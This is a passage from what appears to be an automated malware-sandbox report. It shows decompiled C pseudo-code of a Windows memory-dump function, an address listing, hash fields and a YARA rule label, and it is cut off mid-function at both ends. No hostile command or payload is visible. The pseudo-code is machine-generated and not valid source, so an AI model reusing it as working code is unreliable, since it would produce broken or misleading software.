				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x3481178);
				E033FD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E03474C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E033ED000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E03475542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x34960e8;
								if( *0x34960e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x34960e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E033E9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E033E6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E033EF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E033EF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E033EF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E033EFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E033EFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E033EF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E033EF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E03474CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E033FD130(_t427, _t494, _t511);
				}
			}










































































                                          0x03475ba5
                                          0x03475baa
                                          0x03475baf
                                          0x03475bb4
                                          0x03475bb6
                                          0x03475bbc
                                          0x03475bbe
                                          0x03475bc4
                                          0x03475bcd
                                          0x03475bd3
                                          0x03475bd6
                                          0x03475bdc
                                          0x03475be0
                                          0x03475be3
                                          0x03475beb
                                          0x03475bf2
                                          0x03475bf8
                                          0x03475bfe
                                          0x03475c04
                                          0x03475c0e
                                          0x03475c18
                                          0x03475c1f
                                          0x03475c25
                                          0x03475c2a
                                          0x03475c2c
                                          0x03475c32
                                          0x03475c3a
                                          0x03475c3f
                                          0x03475c42
                                          0x03475c48
                                          0x03475c5b
                                          0x03475c5b
                                          0x03475c2c
                                          0x03475cb7
                                          0x03475cb9
                                          0x03475cbf
                                          0x03475cc2
                                          0x03475cca
                                          0x03475ccb
                                          0x03475ccb
                                          0x03475cd1
                                          0x03475cd7
                                          0x03475cda
                                          0x03475ce1
                                          0x03475ce4
                                          0x03475ce7
                                          0x03475ced
                                          0x03475cf3
                                          0x03475cf9
                                          0x03475cff
                                          0x03475d08
                                          0x03475d0a
                                          0x03475d0e
                                          0x03475d10
                                          0x00000000
                                          0x00000000
                                          0x03475d16
                                          0x03475d1a
                                          0x00000000
                                          0x00000000
                                          0x03475d20
                                          0x03475d22
                                          0x03475d25
                                          0x03475d2f
                                          0x03475d2f
                                          0x03475d33
                                          0x03475d3d
                                          0x03475d49
                                          0x03475d4b
                                          0x00000000
                                          0x00000000
                                          0x03475d5a
                                          0x03475d5d
                                          0x03475d60
                                          0x00000000
                                          0x00000000
                                          0x03475d66
                                          0x03475d69
                                          0x00000000
                                          0x00000000
                                          0x03475d6f
                                          0x03475d6f
                                          0x03475d73
                                          0x03475d79
                                          0x03475d7f
                                          0x03475d86
                                          0x03475d95
                                          0x03475d98
                                          0x03475dba
                                          0x03475dcb
                                          0x03475dce
                                          0x03475dd3
                                          0x03475dd6
                                          0x03475dd8
                                          0x03475de6
                                          0x03475dec
                                          0x03475dee
                                          0x03475df1
                                          0x03475df3
                                          0x0347635a
                                          0x0347635a
                                          0x00000000
                                          0x0347635a
                                          0x03475dfe
                                          0x03475e02
                                          0x03475e05
                                          0x03475e07
                                          0x03475e10
                                          0x03475e13
                                          0x03475e1b
                                          0x03475e1c
                                          0x03475e21
                                          0x03475e22
                                          0x03475e23
                                          0x03475e25
                                          0x03475e2a
                                          0x03475e2c
                                          0x03475e2e
                                          0x03475e36
                                          0x03475e39
                                          0x03475e42
                                          0x03475e47
                                          0x03475e4d
                                          0x03475e54
                                          0x03475e54
                                          0x03475e54
                                          0x03475e2e
                                          0x03475e5c
                                          0x03475e5f
                                          0x03475e62
                                          0x03475e64
                                          0x03475e6b
                                          0x03475e70
                                          0x03475e7a
                                          0x03475e7a
                                          0x03475e7a
                                          0x03475e6b
                                          0x03475e7e
                                          0x03475e7f
                                          0x03475e7f
                                          0x03475e81
                                          0x03475e87
                                          0x03475e8b
                                          0x03475e8c
                                          0x03475e8c
                                          0x03475e8c
                                          0x03475e9a
                                          0x03475e9c
                                          0x03475ea2
                                          0x03475ea6
                                          0x03475f50
                                          0x03475f50
                                          0x03475f57
                                          0x03475f66
                                          0x03475f66
                                          0x03475f66
                                          0x03475f68
                                          0x03475f6a
                                          0x034763d0
                                          0x00000000
                                          0x03475f70
                                          0x03475f70
                                          0x03475f91
                                          0x03475f9c
                                          0x03475f9e
                                          0x03475fa4
                                          0x03475fa6
                                          0x0347638c
                                          0x03476392
                                          0x034763a1
                                          0x034763a7
                                          0x034763af
                                          0x034763af
                                          0x034763bd
                                          0x034763d8
                                          0x00000000
                                          0x034763d8
                                          0x03475fac
                                          0x03475fb2
                                          0x03475fb4
                                          0x03475fbd
                                          0x03475fc6
                                          0x03475fce
                                          0x03475fd4
                                          0x03475fdc
                                          0x03475fec
                                          0x03475fed
                                          0x03475fee
                                          0x03475fef
                                          0x03475ff9
                                          0x03475ffa
                                          0x03475ffb
                                          0x03475ffc
                                          0x03476000
                                          0x03476004
                                          0x03476012
                                          0x03476012
                                          0x03476018
                                          0x03476019
                                          0x0347601a
                                          0x0347601b
                                          0x0347601c
                                          0x03476020
                                          0x03476059
                                          0x0347605c
                                          0x03476061
                                          0x03476061
                                          0x03476022
                                          0x03476022
                                          0x03476022
                                          0x03476025
                                          0x0347602a
                                          0x0347602b
                                          0x03476031
                                          0x03476037
                                          0x03476038
                                          0x0347603e
                                          0x03476048
                                          0x03476049
                                          0x0347604a
                                          0x0347604b
                                          0x0347604c
                                          0x0347604d
                                          0x03476053
                                          0x03476054
                                          0x03476054
                                          0x03476062
                                          0x03476065
                                          0x03476067
                                          0x0347606a
                                          0x03476070
                                          0x03476075
                                          0x03476076
                                          0x03476081
                                          0x03476087
                                          0x03476095
                                          0x03476099
                                          0x0347609e
                                          0x034760a4
                                          0x034760ae
                                          0x034760b0
                                          0x034760b3
                                          0x034760b6
                                          0x034760b8
                                          0x034760ba
                                          0x034760ba
                                          0x034760ba
                                          0x034760ba
                                          0x034760be
                                          0x034760c0
                                          0x034760c5
                                          0x034760c5
                                          0x034760c5
                                          0x034760c6
                                          0x034760cd
                                          0x03476114
                                          0x034760cf
                                          0x034760cf
                                          0x034760d4
                                          0x034760d5
                                          0x034760da
                                          0x034760db
                                          0x034760e1
                                          0x034760e2
                                          0x034760e8
                                          0x034760f8
                                          0x034760fd
                                          0x034760fe
                                          0x03476102
                                          0x03476104
                                          0x03476107
                                          0x03476109
                                          0x0347610b
                                          0x0347610b
                                          0x0347610b
                                          0x0347610b
                                          0x0347610f
                                          0x0347610f
                                          0x03476117
                                          0x0347611a
                                          0x0347611f
                                          0x03476125
                                          0x03476134
                                          0x03476139
                                          0x0347613f
                                          0x03476146
                                          0x03476148
                                          0x0347614b
                                          0x0347614d
                                          0x0347614f
                                          0x0347614f
                                          0x0347614f
                                          0x0347614f
                                          0x03476153
                                          0x03476159
                                          0x03476159
                                          0x0347615c
                                          0x03476163
                                          0x03476169
                                          0x0347616c
                                          0x03476172
                                          0x03476181
                                          0x03476186
                                          0x03476187
                                          0x0347618b
                                          0x03476191
                                          0x03476195
                                          0x034761a3
                                          0x034761bb
                                          0x034761c0
                                          0x034761c3
                                          0x034761cc
                                          0x034761d0
                                          0x034761dc
                                          0x034761de
                                          0x034761e1
                                          0x034761e4
                                          0x034761e6
                                          0x034761e8
                                          0x034761e8
                                          0x034761e8
                                          0x034761e8
                                          0x034761e6
                                          0x034761ec
                                          0x034761f3
                                          0x03476203
                                          0x03476209
                                          0x0347620a
                                          0x03476216
                                          0x0347621d
                                          0x03476227
                                          0x03476241
                                          0x03476246
                                          0x0347624c
                                          0x03476257
                                          0x03476259
                                          0x0347625c
                                          0x0347625e
                                          0x03476260
                                          0x03476260
                                          0x03476260
                                          0x03476260
                                          0x0347625e
                                          0x03476264
                                          0x03476267
                                          0x03476269
                                          0x03476315
                                          0x03476315
                                          0x0347631b
                                          0x0347631e
                                          0x03476324
                                          0x03476327
                                          0x0347632f
                                          0x03476330
                                          0x03476333
                                          0x0347633a
                                          0x0347633c
                                          0x03476335
                                          0x03476335
                                          0x03476335
                                          0x0347633f
                                          0x03476342
                                          0x0347634c
                                          0x03476352
                                          0x03476355
                                          0x03476355
                                          0x03476359
                                          0x00000000
                                          0x0347626f
                                          0x03476275
                                          0x03476275
                                          0x03476278
                                          0x0347627e
                                          0x0347627e
                                          0x03476281
                                          0x03476287
                                          0x0347628d
                                          0x03476298
                                          0x0347629c
                                          0x034762a2
                                          0x0347629e
                                          0x0347629e
                                          0x0347629e
                                          0x034762a7
                                          0x034762a7
                                          0x034762aa
                                          0x034762b0
                                          0x034762f0
                                          0x034762f0
                                          0x034762f2
                                          0x034762f8
                                          0x034762fd
                                          0x034762b2
                                          0x034762b2
                                          0x034762b2
                                          0x034762b5
                                          0x034762dd
                                          0x034762e2
                                          0x034762e5
                                          0x034762b7
                                          0x034762b8
                                          0x034762bb
                                          0x034762bd
                                          0x034762c0
                                          0x034762c4
                                          0x034762cd
                                          0x034762cd
                                          0x034762c0
                                          0x034762bb
                                          0x034762b5
                                          0x03476302
                                          0x03476303
                                          0x03476305
                                          0x03476305
                                          0x03476305
                                          0x0347630c
                                          0x0347630c
                                          0x00000000
                                          0x0347627e
                                          0x03476269
                                          0x03475eac
                                          0x03475ebb
                                          0x03475ebe
                                          0x03475ecb
                                          0x03475ecb
                                          0x03475ece
                                          0x03475ece
                                          0x03475ed4
                                          0x03475ed7
                                          0x03475ed9
                                          0x03475edb
                                          0x03475edb
                                          0x03475ee1
                                          0x03475ee1
                                          0x03475ee3
                                          0x03475f20
                                          0x03475f20
                                          0x03475ee5
                                          0x03475ee5
                                          0x03475ee5
                                          0x03475ee8
                                          0x03475f11
                                          0x03475f18
                                          0x03475eea
                                          0x03475eea
                                          0x03475eed
                                          0x03475ef2
                                          0x03475ef8
                                          0x03475efb
                                          0x03475f0a
                                          0x03475f0a
                                          0x03475eed
                                          0x03475ee8
                                          0x03475f22
                                          0x03475f28
                                          0x00000000
                                          0x00000000
                                          0x03475f30
                                          0x03475f31
                                          0x03475f37
                                          0x03475f3a
                                          0x03475f3d
                                          0x03475f44
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03475f46
                                          0x03475f48
                                          0x03475f4d
                                          0x00000000
                                          0x03475f4d
                                          0x03475dda
                                          0x03475ddf
                                          0x00000000
                                          0x03475ddf
                                          0x03475dd8
                                          0x03475da7
                                          0x03475da9
                                          0x03475dac
                                          0x03475dae
                                          0x00000000
                                          0x03475db4
                                          0x03475db4
                                          0x00000000
                                          0x03475db4
                                          0x03475dae
                                          0x03475d88
                                          0x03475d8d
                                          0x03476363
                                          0x03476369
                                          0x0347636a
                                          0x03476370
                                          0x03476372
                                          0x0347637a
                                          0x0347637b
                                          0x0347637d
                                          0x00000000
                                          0x00000000
                                          0x0347637f
                                          0x03476385
                                          0x00000000
                                          0x03476385
                                          0x03475d38
                                          0x03475d3b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03475d3b
                                          0x03475d27
                                          0x03475d29
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03476360
                                          0x00000000
                                          0x03476360
                                          0x03475c10
                                          0x03475c10
                                          0x034763da
                                          0x034763e5
                                          0x034763e5

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4d458c066bf0ddbff596120a491a51b91d7a0cac5e70c53d61d93e9c2e27bba9
                                          • Instruction ID: e817d3b7b2587bc124fae60ee3f0771e501f09b3107a2068437610530dd7f329
                                          • Opcode Fuzzy Hash: 4d458c066bf0ddbff596120a491a51b91d7a0cac5e70c53d61d93e9c2e27bba9
                                          • Instruction Fuzzy Hash: FE4247759006298FDB24CF68C880BAAB7B2FF49304F1981EAD85DAF342D7749985CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033C6E30, Relevance: .5, Instructions: 481COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E033C6E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
